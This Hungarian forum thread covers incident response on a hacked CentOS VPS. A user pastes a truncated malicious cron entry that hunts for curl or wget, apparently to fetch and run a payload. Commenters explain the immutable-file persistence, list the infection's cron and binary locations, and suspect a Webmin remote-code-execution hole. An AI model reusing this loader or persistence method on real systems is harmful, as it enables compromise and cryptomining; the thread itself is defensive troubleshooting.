cron hack

 ( makgab | 2019. augusztus 19., hétfő - 9:06 )

Üdv!
Egy up-to-date 6.* centos-ra (vps) felment egy "cron hack"(?).
A /etc/cron.d-ben egy:
*/17 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" ...

A crond service-t leállítom, de nem tudom root-ként kitörölni (művelet nem megengedett).
A cron.d-t átneveztem és egy üres cron.d-vel sem enged reboot után.

A /usr/local/bin/nptd hozta létre és azt sem tudom törölni.

Futó folyamatok között semmit se látok:
https://pastebin.com/d4Qk6R1z

Mivel tudnám törölni? A rkhunter nem látott semmit.

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

lsattr mit hazudik?

cron.d_save]# lsattr
----i--------e- ./root

i: immutable

"chattr -i file" és törölhető.

hat akkor szedd le rola az immutablet aztan torold...

Mármint CD-ről boot és legutóbbi még tiszta backupot tolja vissza. Ugye ezt akartad mondani? És persze keresse meg (és foltozza be), hogy hol "jött be" a sz@r, mert ha egyszer bement, másodszor is be fog.

pont azt írtam: chattr -i file
leszedtem.

Hogy ette be a fene?

gyanitom vmi csinos kis php53 hole...

én azt gyanítom, hogy ott jött be...

php7.3
most frissítem 7.3.8-ra.

Talán webmin? https://hup.hu/cikkek/20190819/webmin_1_920_unauthenticated_rce
Minden csomagkezelőből telepítve?

Lehet... egyelőre lekaptam a webmin-t.

Ezt csinálta:
* /etc/crontab-ba beírta a $SUBJ-ben levő scriptet (persze hosszab volt).
* a root cron-jába is betette
* cron.d-be is beírta
* cron daily-be is beírta
* cron hourly-ba is beírta
* /usr/local/bin/nptd fájlt hozta létre
* és a /root/.cache alá dolgozott

minek hasznal barki webmint? plane publikus IPn

+1 Bár aki az lsattr/chattr dolgot most fedezi fel, annak... No mindegy.

Vagy ha már használ, miért nem tesz legalább elé egy basic auth-ot nem publikus felhasználónévvel és jelszóval.

-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…

Volt auth.

És a Basic Auth-on, amit a webszerver ad (htpasswd) hogyan jutottak át?

-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…

[Feliratkozás]

:-)

nem most fedezi fel, mert utána meg is oldottam.

Szokott lenni még forráskód is, amit bootolás után fordít be a féreg. Ilyennel találkoztam. Nyálazz rá minden indulási folyamatra is.
Amúgy a Webmin publikus hálózaton volt?

Ez nem új dolog.. Május óta látni hasonló eseteket:
https://forums.zimbra.org/viewtopic.php?t=65932&start=120
https://stackoverflow.com/questions/56563418/what-does-this-entry-in-my-servers-crontab-do

Alapvetően exim / zimbra vuln-el volt kapcsolatos, de mással is simán bejöhetett.. Nem tudom nálad melyik variáns található, de eredetileg crypto miner-eket telepítettek így az áldozat gépére. Ha fel tudnád rakni a teljes crontab entry-t (mondjuk pastebin-re) az lehet sokat segítene
____________________________________
Az embert 2 éven át arra tanítják hogyan álljon meg a 2 lábán, és hogyan beszéljen... Aztán azt mondják neki: -"Ülj le és kuss legyen!"..

https://hup.hu/cikkek/20190819/webmin_1_920_unauthenticated_rce?comments_per_page=9999#comment-2378190
____________________________________
Az embert 2 éven át arra tanítják hogyan álljon meg a 2 lábán, és hogyan beszéljen... Aztán azt mondják neki: -"Ülj le és kuss legyen!"..